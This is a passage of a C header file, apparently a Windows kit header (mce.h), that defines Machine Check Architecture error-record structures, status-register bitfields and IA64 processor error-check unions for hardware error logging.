6 |
7 | mce.h
8 |
9 | Abstract:
10 |
11 | This header file defines the Machine Check Errors definitions.
12 |
13 | Author:
14 |
15 | Revision History:
16 |
17 | Creation: 04-Apr-2001
18 |
19 | --*/
20 |
21 | #ifndef _MCE_
22 | #define _MCE_
23 |
24 | #pragma once
25 |
26 | #if _MSC_VER >= 1200
27 | #pragma warning(push)
28 | #pragma warning(disable:4201) // nonstandard extension used : nameless struct/union
29 | #pragma warning(disable:4214) // nonstandard extension used : bit field types other then int
30 | #endif
31 |
32 | //
33 | // HalMcaLogInformation
34 | //
35 |
36 | typedef enum {
37 | HAL_MCE_RECORD,
38 | HAL_MCA_RECORD
39 | } MCA_EXCEPTION_TYPE;
40 |
41 | #if defined(_X86_) || defined(_IA64_) || defined(_AMD64_)
42 |
43 | //
44 | // ADDR register for each MCA bank
45 | //
46 |
47 | typedef union _MCI_ADDR{
48 | struct {
49 | ULONG Address;
50 | ULONG Reserved;
51 | } DUMMYSTRUCTNAME;
52 |
53 | ULONGLONG QuadPart;
54 | } MCI_ADDR, *PMCI_ADDR;
55 |
56 |
57 | #if defined(_AMD64_)
58 |
59 | //
60 | // STATUS register for each MCA bank.
61 | //
62 |
63 | #if (NTDDI_VERSION <= NTDDI_WINXP)
64 | typedef union _MCI_STATS {
65 | struct {
66 | USHORT McaCod;
67 | USHORT ModelErrorCode;
68 | ULONG OtherInfo : 25;
69 | ULONG Damage : 1;
70 | ULONG AddressValid : 1;
71 | ULONG MiscValid : 1;
72 | ULONG Enabled : 1;
73 | ULONG Uncorrected : 1;
74 | ULONG OverFlow : 1;
75 | ULONG Valid : 1;
76 | } MciStatus;
77 |
78 | ULONG64 QuadPart;
79 | } MCI_STATS, *PMCI_STATS;
80 | #else
81 | typedef union _MCI_STATS {
82 | struct {
83 | USHORT McaErrorCode;
84 | USHORT ModelErrorCode;
85 | ULONG OtherInformation : 25;
86 | ULONG ContextCorrupt : 1;
87 | ULONG AddressValid : 1;
88 | ULONG MiscValid : 1;
89 | ULONG ErrorEnabled : 1;
90 | ULONG UncorrectedError : 1;
91 | ULONG StatusOverFlow : 1;
92 | ULONG Valid : 1;
93 | } MciStatus;
94 |
95 | ULONG64 QuadPart;
96 | } MCI_STATS, *PMCI_STATS;
97 | #endif
98 |
99 | #endif // _AMD64_
100 |
101 | #if defined(_X86_)
102 |
103 | //
104 | // STATUS register for each MCA bank.
105 | //
106 |
107 | typedef union _MCI_STATS {
108 | struct {
109 | USHORT McaCod;
110 | USHORT MsCod;
111 | ULONG OtherInfo : 25;
112 | ULONG Damage : 1;
113 | ULONG AddressValid : 1;
114 | ULONG MiscValid : 1;
115 | ULONG Enabled : 1;
116 | ULONG UnCorrected : 1;
117 | ULONG OverFlow : 1;
118 | ULONG Valid : 1;
119 | } MciStats;
120 |
121 | ULONGLONG QuadPart;
122 |
123 | } MCI_STATS, *PMCI_STATS;
124 |
125 | #endif // _X86_
126 |
127 | //
128 | // MCA exception log entry
129 | // Defined as a union to contain MCA specific log or Pentium style MCE info.
130 | //
131 |
132 | #define MCA_EXTREG_V2MAX 24 // X86: Max. Number of extended registers
133 |
134 | #if defined(_X86_) || defined(_AMD64_)
135 |
136 | #if (NTDDI_VERSION >= NTDDI_WINXP)
137 | typedef struct _MCA_EXCEPTION {
138 |
139 | // Begin Version 1 stuff
140 | ULONG VersionNumber; // Version number of this record type
141 | MCA_EXCEPTION_TYPE ExceptionType; // MCA or MCE
142 | LARGE_INTEGER TimeStamp; // exception recording timestamp
143 | ULONG ProcessorNumber;
144 | ULONG Reserved1;
145 |
146 | union {
147 | struct {
148 | UCHAR BankNumber;
149 | UCHAR Reserved2[7];
150 | MCI_STATS Status;
151 | MCI_ADDR Address;
152 | ULONGLONG Misc;
153 | } Mca;
154 |
155 | struct {
156 | ULONGLONG Address; // physical addr of cycle causing the error
157 | ULONGLONG Type; // cycle specification causing the error
158 | } Mce;
159 | } u;
160 | // End Version 1 stuff
161 |
162 | // Begin Version 2 stuff
163 | ULONG ExtCnt;
164 | ULONG Reserved3;
165 | ULONGLONG ExtReg[MCA_EXTREG_V2MAX];
166 | // End Version 2 stuff
167 |
168 | } MCA_EXCEPTION, *PMCA_EXCEPTION;
169 | #else
170 | typedef struct _MCA_EXCEPTION {
171 |
172 | ULONG VersionNumber; // Version number of this record type
173 | MCA_EXCEPTION_TYPE ExceptionType; // MCA or MCE
174 | LARGE_INTEGER TimeStamp; // exception recording timestamp
175 | ULONG ProcessorNumber;
176 | ULONG Reserved1;
177 |
178 | union {
179 | struct {
180 | UCHAR BankNumber;
181 | UCHAR Reserved2[7];
182 | MCI_STATS Status;
183 | MCI_ADDR Address;
184 | ULONGLONG Misc;
185 | } Mca;
186 |
187 | struct {
188 | ULONGLONG Address; // physical addr of cycle causing the error
189 | ULONGLONG Type; // cycle specification causing the error
190 | } Mce;
191 | } u;
192 |
193 | } MCA_EXCEPTION, *PMCA_EXCEPTION;
194 | #endif
195 |
196 | typedef MCA_EXCEPTION CMC_EXCEPTION, *PCMC_EXCEPTION; // Corrected Machine Check
197 | typedef MCA_EXCEPTION CPE_EXCEPTION, *PCPE_EXCEPTION; // Corrected Platform Error
198 |
199 | #if (NTDDI_VERSION >= NTDDI_WINXP)
200 | #define MCA_EXCEPTION_V1_SIZE FIELD_OFFSET(MCA_EXCEPTION, ExtCnt)
201 | #define MCA_EXCEPTION_V2_SIZE sizeof(struct _MCA_EXCEPTION)
202 | #endif
203 |
204 | #endif // _X86_ || _AMD64_
205 |
206 | //
207 | // ERRORS: ERROR_SEVERITY definitions
208 | //
209 | // One day the MS compiler will support typed enums with type != int so this
210 | // type of enums (UCHAR, __int64) could be defined...
211 | //
212 |
213 | #if defined(_AMD64_) || defined(_IA64_)
214 |
215 | typedef UCHAR ERROR_SEVERITY, *PERROR_SEVERITY;
216 |
217 | typedef enum _ERROR_SEVERITY_VALUE {
218 | ErrorRecoverable = 0,
219 | ErrorFatal = 1,
220 | ErrorCorrected = 2,
221 | ErrorOthers = 3, // [3,...] values are reserved
222 | } ERROR_SEVERITY_VALUE;
223 |
224 | #endif
225 |
226 | #if defined(_IA64_)
227 |
228 | #if 0
229 | // FIXFIX: This should not be required for IA64.
230 | //
231 | // STATUS register for each MCA bank.
232 | //
233 |
234 | typedef union _MCI_STATS {
235 | struct {
236 | USHORT McaCod;
237 | USHORT MsCod;
238 | ULONG OtherInfo : 25;
239 | ULONG Damage : 1;
240 | ULONG AddressValid : 1;
241 | ULONG MiscValid : 1;
242 | ULONG Enabled : 1;
243 | ULONG UnCorrected : 1;
244 | ULONG OverFlow : 1;
245 | ULONG Valid : 1;
246 | } MciStats;
247 |
248 | ULONGLONG QuadPart;
249 |
250 | } MCI_STATS, *PMCI_STATS;
251 |
252 | #endif // 0
253 |
254 | //
255 | // IA64 ERRORS: ERROR_REVISION definitions
256 | //
257 |
258 | typedef union _ERROR_REVISION {
259 | USHORT Revision; // Major and Minor revision number of the record:
260 | struct {
261 | UCHAR Minor; // Byte0: Minor.
262 | UCHAR Major; // Byte1: Major.
263 | } DUMMYSTRUCTNAME;
264 | } ERROR_REVISION, *PERROR_REVISION;
265 |
266 | // For Info:
267 | #if (NTDDI_VERSION > NTDDI_WINXP)
268 | #define ERROR_MAJOR_REVISION_SAL_03_00 0
269 | #define ERROR_MINOR_REVISION_SAL_03_00 2
270 | #define ERROR_REVISION_SAL_03_00 { ERROR_MINOR_REVISION_SAL_03_00, \
271 | ERROR_MAJOR_REVISION_SAL_03_00 }
272 |
273 | //
274 | // Section Header revision is fixed at Major == 2 and Minor == 0
275 | //
276 | #define ERROR_FIXED_SECTION_REVISION { 2,\
277 | 0 }
278 | #else
279 | #define ERROR_REVISION_SAL_03_00 { 2, 0 }
280 | #endif
281 |
282 | //
283 | // IA64 ERRORS: ERROR_TIMESTAMP definitions
284 | //
285 |
286 | typedef union _ERROR_TIMESTAMP {
287 | ULONGLONG TimeStamp;
288 | struct {
289 | UCHAR Seconds; // Byte0: Seconds
290 | UCHAR Minutes; // Byte1: Minutes
291 | UCHAR Hours; // Byte2: Hours
292 | UCHAR Reserved; // Byte3: Reserved
293 | UCHAR Day; // Byte4: Day
294 | UCHAR Month; // Byte5: Month
295 | UCHAR Year; // Byte6: Year
296 | UCHAR Century; // Byte7: Century
297 | } DUMMYSTRUCTNAME;
298 | } ERROR_TIMESTAMP, *PERROR_TIMESTAMP;
299 |
300 | //
301 | // IA64 ERRORS: ERROR_GUID definitions
302 | //
303 |
304 | typedef struct _ERROR_GUID {
305 | ULONG Data1;
306 | USHORT Data2;
307 | USHORT Data3;
308 | UCHAR Data4[8];
309 | } ERROR_GUID, *PERROR_GUID;
310 |
311 | //
312 | // IA64 ERRORS: ERROR GUIDs definitions
313 | //
314 |
315 | typedef ERROR_GUID _ERROR_DEVICE_GUID;
316 | typedef _ERROR_DEVICE_GUID ERROR_DEVICE_GUID, *PERROR_DEVICE_GUID;
317 |
318 | typedef ERROR_GUID _ERROR_PLATFORM_GUID;
319 | typedef _ERROR_PLATFORM_GUID ERROR_PLATFORM_GUID, *PERROR_PLATFORM_GUID;
320 |
321 | //
322 | // IA64 ERRORS: ERROR_RECORD_HEADER definitions
323 | //
324 |
325 | typedef union _ERROR_RECORD_VALID {
326 | UCHAR Valid;
327 | struct { // Bits
328 | UCHAR OemPlatformID:1; // 0: OEM Platform Id is present in the record header
329 | UCHAR Reserved:7; // 1-7: Reserved
330 | } DUMMYSTRUCTNAME;
331 | } ERROR_RECORD_VALID, *PERROR_RECORD_VALID;
332 |
333 | typedef struct _ERROR_RECORD_HEADER { // Offsets:
334 | ULONGLONG Id; // 0: Unique identifier
335 | ERROR_REVISION Revision; // 8: Major and Minor revision number of the record
336 | ERROR_SEVERITY ErrorSeverity; // 10: Error Severity
337 | ERROR_RECORD_VALID Valid; // 11: Validation bits
338 | ULONG Length; // 12: Length of this record in bytes, including the header
339 | ERROR_TIMESTAMP TimeStamp; // 16: Timestamp recorded when event occurred
340 | UCHAR OemPlatformId[16]; // 24: Unique platform identifier. OEM defined.
341 | } ERROR_RECORD_HEADER, *PERROR_RECORD_HEADER;
342 |
343 | //
344 | // IA64 ERRORS: ERROR_SECTION_HEADER definitions
345 | //
346 |
347 | typedef union _ERROR_RECOVERY_INFO {
348 | UCHAR RecoveryInfo;
349 | struct { // Bits:
350 | UCHAR Corrected:1; // 0: Corrected
351 | UCHAR NotContained:1; // 1: Containment Warning
352 | UCHAR Reset:1; // 2: Reset
353 | UCHAR Reserved:4; // 6-3: Reserved
354 | UCHAR Valid:1; // 7: Valid Recovery Information
355 | } DUMMYSTRUCTNAME;
356 | } ERROR_RECOVERY_INFO, *PERROR_RECOVERY_INFO;
357 |
358 | typedef struct _ERROR_SECTION_HEADER {
359 | ERROR_DEVICE_GUID Guid; // Unique identifier
360 | ERROR_REVISION Revision; // Major and Minor revision number of the section
361 | ERROR_RECOVERY_INFO RecoveryInfo; // Recovery Information
362 | UCHAR Reserved;
363 | ULONG Length; // Length of this error device section in bytes,
364 | // including the header.
365 | } ERROR_SECTION_HEADER, *PERROR_SECTION_HEADER;
366 |
367 | //
368 | // IA64 Machine Check Error Logs:
369 | // WMI requires processor LID being stored in the Log.
370 | // This LID corresponds to the processor on which the SAL_PROC was executed on.
371 | //
372 | // TEMPTEMP: Implementation is temporary, until we implement HAL SW Error Section.
373 | // Note that the current FW builds do not update the _ERROR_PROCESSOR.CRLid field,
374 | // assuming there is a _ERROR_PROCESSOR section in the record.
375 | //
376 |
377 | #if !defined(__midl) && defined(_MSC_EXTENSIONS)
378 | __inline
379 | USHORT
380 | GetFwMceLogProcessorNumber(
381 | PERROR_RECORD_HEADER Log
382 | )
383 | {
384 | PERROR_SECTION_HEADER section = (PERROR_SECTION_HEADER)((ULONG64)Log + sizeof(*Log));
385 | USHORT lid = (USHORT)((UCHAR)(section->Reserved));
386 | lid |= (USHORT)((UCHAR)(Log->TimeStamp.Reserved) << 8);
387 | return( lid );
388 | } // GetFwMceLogProcessorNumber()
389 | #endif // !__midl
390 |
391 | //
392 | // IA64 ERRORS: ERROR_PROCESSOR device definitions
393 | //
394 | // The MCA architecture supports five different types of error reporting functional units
395 | // with the associated error records and its error severity.
396 | // At any point in time, a processor could encounter an MCA/CMC event due to errors detected
397 | // in one or more of the following units:
398 | // - Cache Check
399 | // - TLB Check
400 | // - Bus Check
401 | // - Register File
402 | // - Micro Architectural
403 | //
404 | // Terminology:
405 | //
406 | // - Target Address:
407 | // 64-bit integer containing the physical address where the data was to be delivered or
408 | // obtained. This could also be the incoming address for external snoops and TLB shoot-downs.
409 | //
410 | // - Requester Identifier:
411 | // 64-bit integer specifying the bus agent that generated the transaction responsible for
412 | // the Machine Check event.
413 | //
414 | // - Responder Identifier:
415 | // 64-bit integer specifying the bus agent that responded to a transaction responsible for
416 | // the Machine Check event.
417 | //
418 | // - Precise Instruction Pointer:
419 | // 64-bit integer specifying the virtual address that points to the IA-64 bundle that
420 | // contained the instruction responsible for the Machine Check event.
421 | //
422 |
423 | #define ERROR_PROCESSOR_GUID \
424 | { 0xe429faf1, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }}
425 |
426 | typedef union _ERROR_MODINFO_VALID {
427 | ULONGLONG Valid;
428 | struct { // Bits
429 | ULONGLONG CheckInfo: 1; // 0:
430 | ULONGLONG RequestorIdentifier: 1; // 1:
431 | ULONGLONG ResponderIdentifier: 1; // 2:
432 | ULONGLONG TargetIdentifier: 1; // 3:
433 | ULONGLONG PreciseIP: 1; // 4:
434 | ULONGLONG Reserved: 59; // 5-63:
435 | } DUMMYSTRUCTNAME;
436 | } ERROR_MODINFO_VALID, *PERROR_MODINFO_VALID;
437 |
438 | typedef enum _ERROR_CHECK_IS {
439 | isIA64 = 0,
440 | isIA32 = 1,
441 | } ERROR_CHECK_IS;
442 |
443 | typedef enum _ERROR_CACHE_CHECK_OPERATION {
444 | CacheUnknownOp = 0,
445 | CacheLoad = 1,
446 | CacheStore = 2,
447 | CacheInstructionFetch = 3,
448 | CacheDataPrefetch = 4,
449 | CacheSnoop = 5,
450 | CacheCastOut = 6,
451 | CacheMoveIn = 7,
452 | } ERROR_CACHE_CHECK_OPERATION;
453 |
454 | typedef enum _ERROR_CACHE_CHECK_MESI {
455 | CacheInvalid = 0,
456 | CacheHeldShared = 1,
457 | CacheHeldExclusive = 2,
458 | CacheModified = 3,
459 | } ERROR_CACHE_CHECK_MESI;
460 |
461 | #if (NTDDI_VERSION >= NTDDI_VISTA)
462 | typedef union _ERROR_CACHE_CHECK {
463 | ULONGLONG CacheCheck;
464 | struct
465 | {
466 | ULONGLONG Operation:4; // bits 0- 3: Cache operation
467 | ULONGLONG Level:2; // 4- 5: Cache Level
468 | ULONGLONG Reserved1:2; // 6- 7
469 | ULONGLONG DataLine:1; // 8 : Failure data part of cache line
470 | ULONGLONG TagLine:1; // 9 : Failure tag part of cache line
471 | ULONGLONG DataCache:1; // 10 : Failure in data cache
472 | ULONGLONG InstructionCache:1; // 11 : Failure in instruction cache
473 | ULONGLONG MESI:3; // 12-14:
474 | ULONGLONG MESIValid:1; // 15 : MESI field is valid
475 | ULONGLONG Way:5; // 16-20: Failure in Way of Cache
476 | ULONGLONG WayIndexValid:1; // 21 : Way and Index fields valid
477 | ULONGLONG Reserved2:1; // 22
478 | ULONGLONG DP:1; // 23 : 1 - error due to data poisoning
479 | ULONGLONG Reserved3:8; // 24-31
480 | ULONGLONG Index:20; // 32-51: Index of cache line
481 | ULONGLONG Reserved4:2; // 52-53
482 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction
483 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid
484 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction
485 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid
486 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected
487 | ULONGLONG TargetAddressValid:1; // 60 : Target Address is valid
488 | ULONGLONG RequestIdValid:1; // 61 : RequestId is valid
489 | ULONGLONG ResponderIdValid:1; // 62 : ResponderId is valid
490 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid
491 | } DUMMYSTRUCTNAME;
492 | } ERROR_CACHE_CHECK, *PERROR_CACHE_CHECK;
493 | # else
494 | typedef union _ERROR_CACHE_CHECK {
495 | ULONGLONG CacheCheck;
496 | struct
497 | {
498 | ULONGLONG Operation:4; // bits 0- 3: Cache operation
499 | ULONGLONG Level:2; // 4- 5: Cache Level
500 | ULONGLONG Reserved1:2; // 6- 7
501 | ULONGLONG DataLine:1; // 8 : Failure data part of cache line
502 | ULONGLONG TagLine:1; // 9 : Failure tag part of cache line
503 | ULONGLONG DataCache:1; // 10 : Failure in data cache
504 | ULONGLONG InstructionCache:1; // 11 : Failure in instruction cache
505 | ULONGLONG MESI:3; // 12-14:
506 | ULONGLONG MESIValid:1; // 15 : MESI field is valid
507 | ULONGLONG Way:5; // 16-20: Failure in Way of Cache
508 | ULONGLONG WayIndexValid:1; // 21 : Way and Index fields valid
509 | ULONGLONG Reserved2:10; // 22-31
510 | ULONGLONG Index:20; // 32-51: Index of cache line
511 | ULONGLONG Reserved3:2; // 52-53
512 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction
513 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid
514 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction
515 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid
516 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected
517 | ULONGLONG TargetAddressValid:1; // 60 : Target Address is valid
518 | ULONGLONG RequestIdValid:1; // 61 : RequestId is valid
519 | ULONGLONG ResponderIdValid:1; // 62 : ResponderId is valid
520 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid
521 | } DUMMYSTRUCTNAME;
522 | } ERROR_CACHE_CHECK, *PERROR_CACHE_CHECK;
523 | #endif
524 |
525 | typedef enum _ERROR_TLB_CHECK_OPERATION {
526 | TlbUnknownOp = 0,
527 | TlbAccessWithLoad = 1,
528 | TlbAccessWithStore = 2,
529 | TlbAccessWithInstructionFetch = 3,
530 | TlbAccessWithDataPrefetch = 4,
531 | TlbShootDown = 5,
532 | TlbProbe = 6,
533 | TlbVhptFill = 7,
534 | TlbPurge = 8,
535 | } ERROR_TLB_CHECK_OPERATION;
536 |
537 | typedef union _ERROR_TLB_CHECK {
538 | ULONGLONG TlbCheck;
539 | struct
540 | {
541 | ULONGLONG TRSlot:8; // bits 0- 7: Slot number of Translation Register
542 | ULONGLONG TRSlotValid:1; // 8 : TRSlot field is valid
543 | ULONGLONG Reserved1:1; // 9
544 | ULONGLONG Level:2; // 10-11: TLB Level
545 | ULONGLONG Reserved2:4; // 12-15
546 | ULONGLONG DataTransReg:1; // 16 : Error in data translation register
547 | ULONGLONG InstructionTransReg:1; // 17 : Error in instruction translation register
548 | ULONGLONG DataTransCache:1; // 18 : Error in data translation cache
549 | ULONGLONG InstructionTransCache:1; // 19 : Error in instruction translation cache
550 | ULONGLONG Operation:4; // 20-23: Operation
551 | ULONGLONG Reserved3:30; // 24-53
552 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction
553 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid
554 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction
555 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid
556 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected
557 | ULONGLONG TargetAddressValid:1; // 60 : Target Address is valid
558 | ULONGLONG RequestIdValid:1; // 61 : RequestId is valid
559 | ULONGLONG ResponderIdValid:1; // 62 : ResponderId is valid
560 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid
561 | } DUMMYSTRUCTNAME;
562 | } ERROR_TLB_CHECK, *PERROR_TLB_CHECK;
563 |
564 | typedef enum _ERROR_BUS_CHECK_OPERATION {
565 | BusUnknownOp = 0,
566 | BusPartialRead = 1,
567 | BusPartialWrite = 2,
568 | BusFullLineRead = 3,
569 | BusFullLineWrite = 4,
570 | BusWriteBack = 5,
571 | BusSnoopProbe = 6,
572 | BusIncomingPtcG = 7,
573 | BusWriteCoalescing = 8,
574 | } ERROR_BUS_CHECK_OPERATION;
575 |
576 | #if (NTDDI_VERSION >= NTDDI_VISTA)
577 | typedef union _ERROR_BUS_CHECK {
578 | ULONGLONG BusCheck;
579 | struct
580 | {
581 | ULONGLONG Size:5; // bits 0- 4: Transaction size
582 | ULONGLONG Internal:1; // 5 : Internal bus error
583 | ULONGLONG External:1; // 6 : External bus error
584 | ULONGLONG CacheTransfer:1; // 7 : Error occurred in Cache to Cache Transfer
585 | ULONGLONG Type:8; // 8-15: Transaction type
586 | ULONGLONG Severity:5; // 16-20: Error severity - platform specific
587 | ULONGLONG Hierarchy:2; // 21-22: Level or Bus hierarchy
588 | ULONGLONG DP:1; // 23 : 1 - error due to data poisoning
589 | ULONGLONG Status:8; // 24-31: Bus error status - processor bus specific
590 | ULONGLONG Reserved1:22; // 32-53
591 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction
592 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid
593 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction
594 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid
595 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected
596 | ULONGLONG TargetAddressValid:1; // 60 : Target Address is valid
597 | ULONGLONG RequestIdValid:1; // 61 : RequestId is valid
598 | ULONGLONG ResponderIdValid:1; // 62 : ResponderId is valid
599 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid
600 | } DUMMYSTRUCTNAME;
601 | } ERROR_BUS_CHECK, *PERROR_BUS_CHECK;
602 | #else
603 | typedef union _ERROR_BUS_CHECK {
604 | ULONGLONG BusCheck;
605 | struct
606 | {
607 | ULONGLONG Size:5; // bits 0- 4: Transaction size
608 | ULONGLONG Internal:1; // 5 : Internal bus error
609 | ULONGLONG External:1; // 6 : External bus error
610 | ULONGLONG CacheTransfer:1; // 7 : Error occurred in Cache to Cache Transfer
611 | ULONGLONG Type:8; // 8-15: Transaction type
612 | ULONGLONG Severity:5; // 16-20: Error severity - platform specific
613 | ULONGLONG Hierarchy:2; // 21-22: Level or Bus hierarchy
614 | ULONGLONG Reserved1:1; // 23
615 | ULONGLONG Status:8; // 24-31: Bus error status - processor bus specific
616 | ULONGLONG Reserved2:22; // 32-53
617 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction
618 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid
619 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction
620 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid
621 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected
622 | ULONGLONG TargetAddressValid:1; // 60 : Target Address is valid
623 | ULONGLONG RequestIdValid:1; // 61 : RequestId is valid
624 | ULONGLONG ResponderIdValid:1; // 62 : ResponderId is valid
625 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid
626 | } DUMMYSTRUCTNAME;
627 | } ERROR_BUS_CHECK, *PERROR_BUS_CHECK;
628 | #endif
629 |
630 | typedef enum _ERROR_REGFILE_CHECK_IDENTIFIER {
631 | RegFileUnknownId = 0,
632 | GeneralRegisterBank1 = 1,
633 | GeneralRegisterBank0 = 2,
634 | FloatingPointRegister = 3,
635 | BranchRegister = 4,
636 | PredicateRegister = 5,
637 | ApplicationRegister = 6,
638 | ControlRegister = 7,
639 | RegionRegister = 8,
640 | ProtectionKeyRegister = 9,
641 | DataBreakPointRegister = 10,
642 | InstructionBreakPointRegister = 11,
643 | PerformanceMonitorControlRegister = 12,
644 | PerformanceMonitorDataRegister = 13,
645 | } ERROR_REGFILE_CHECK_IDENTIFIER;
646 |
647 | typedef enum _ERROR_REGFILE_CHECK_OPERATION {
648 | RegFileUnknownOp = 0,
649 | RegFileRead = 1,
650 | RegFileWrite = 2,
651 | } ERROR_REGFILE_CHECK_OPERATION;
652 |
653 | typedef union _ERROR_REGFILE_CHECK {
654 | ULONGLONG RegFileCheck;
655 | struct
656 | {
657 | ULONGLONG Identifier:4; // bits 0- 3: Register file identifier
658 | ULONGLONG Operation:4; // 4- 7: Operation that causes the MC event
659 | ULONGLONG RegisterNumber:7; // 8-14: Register number responsible for MC event
660 | ULONGLONG RegisterNumberValid:1; // 15 : Register number field is valid
661 | ULONGLONG Reserved1:38; // 16-53
662 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction
663 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid
664 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction
665 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid
666 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected
667 | ULONGLONG Reserved2:3; // 60-62
668 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid
669 | } DUMMYSTRUCTNAME;
670 | } ERROR_REGFILE_CHECK, *PERROR_REGFILE_CHECK;
671 |
672 | #if (NTDDK_VERSION <= WINXP)
673 | typedef enum _ERROR_MS_CHECK_OPERATION {
674 | MsUnknownOp = 0,
675 | MsReadOrLoad = 1,
676 | MsWriteOrStore = 2
677 | } ERROR_MS_CHECK_OPERATION;
678 | #else
679 | typedef enum _ERROR_MS_CHECK_OPERATION {
680 | MsUnknownOp = 0,
681 | MsReadOrLoad = 1,
682 | MsWriteOrStore = 2,
683 | MsOverTemperature = 3,
684 | MsNormalTemperature = 4
685 | } ERROR_MS_CHECK_OPERATION;
686 | #endif
687 |
688 | typedef union _ERROR_MS_CHECK {
689 | ULONGLONG MsCheck;
690 | struct
691 | {
692 | ULONGLONG StructureIdentifier:5; // bits 0- 4: Structure Identifier - impl. specific
693 | ULONGLONG Level:3; // 5- 7: Structure Level where error was generated
694 | ULONGLONG ArrayId:4; // 8-11: Identification of the array
695 | ULONGLONG Operation:4; // 12-15: Operation
696 | ULONGLONG Way:6; // 16-21: Way where the error was located
697 | ULONGLONG WayValid:1; // 22 : Way field is valid
698 | ULONGLONG IndexValid:1; // 23 : Index field is valid
699 | ULONGLONG Reserved1:8; // 24-31
700 | ULONGLONG Index:8; // 32-39: Index where the error was located
701 | ULONGLONG Reserved2:14; // 40-53
702 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction
703 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid
704 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction
705 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid
706 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected
707 | ULONGLONG TargetAddressValid:1; // 60 : Target Address is valid
708 | ULONGLONG RequestIdValid:1; // 61 : RequestId is valid
709 | ULONGLONG ResponderIdValid:1; // 62 : ResponderId is valid
710 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid
711 | } DUMMYSTRUCTNAME;
712 | } ERROR_MS_CHECK, *PERROR_MS_CHECK;
713 |
714 | typedef union _ERROR_CHECK_INFO {
715 | ULONGLONG CheckInfo;
716 | ERROR_CACHE_CHECK CacheCheck;
717 | ERROR_TLB_CHECK TlbCheck;
718 | ERROR_BUS_CHECK BusCheck;
719 | ERROR_REGFILE_CHECK RegFileCheck;
720 | ERROR_MS_CHECK MsCheck;
721 | } ERROR_CHECK_INFO, *PERROR_CHECK_INFO;
722 |
723 | // SAL Specs July 2000: The size of _ERROR_MODINFO will always be 48 Bytes.
724 |
725 | typedef struct _ERROR_MODINFO {
726 | ERROR_MODINFO_VALID Valid;
727 | ERROR_CHECK_INFO CheckInfo;
728 | ULONGLONG RequestorId;
729 | ULONGLONG ResponderId;
730 | ULONGLONG TargetId;
731 | ULONGLONG PreciseIP;
732 | } ERROR_MODINFO, *PERROR_MODINFO;
733 |
734 | typedef union _ERROR_PROCESSOR_VALID {
735 | ULONGLONG Valid;
736 | struct { // Bits
737 | ULONGLONG ErrorMap: 1; // 0:
738 | ULONGLONG StateParameter: 1; // 1:
739 | ULONGLONG CRLid: 1; // 2:
740 | ULONGLONG StaticStruct:1; // 3: Processor Static Info error.
741 | ULONGLONG CacheCheckNum:4; // 4-7: Cache errors.
742 | ULONGLONG TlbCheckNum:4; // 8-11: Tlb errors.
743 | ULONGLONG BusCheckNum:4; // 12-15: Bus errors.
744 | ULONGLONG RegFileCheckNum:4; // 16-19: Registers file errors.
745 | ULONGLONG MsCheckNum:4; // 20-23: Micro-Architecture errors.
746 | ULONGLONG CpuIdInfo:1; // 24: CPUID Info.
747 | ULONGLONG Reserved:39; // 25-63: Reserved.
748 | } DUMMYSTRUCTNAME;
749 | } ERROR_PROCESSOR_VALID, *PERROR_PROCESSOR_VALID;
750 |
751 | typedef union _ERROR_PROCESSOR_ERROR_MAP {
752 | ULONGLONG ErrorMap;
753 | struct {
754 | ULONGLONG Cid:4; // bits 0- 3: Processor Core Identifier
755 | ULONGLONG Tid:4; // 4- 7: Logical Thread Identifier
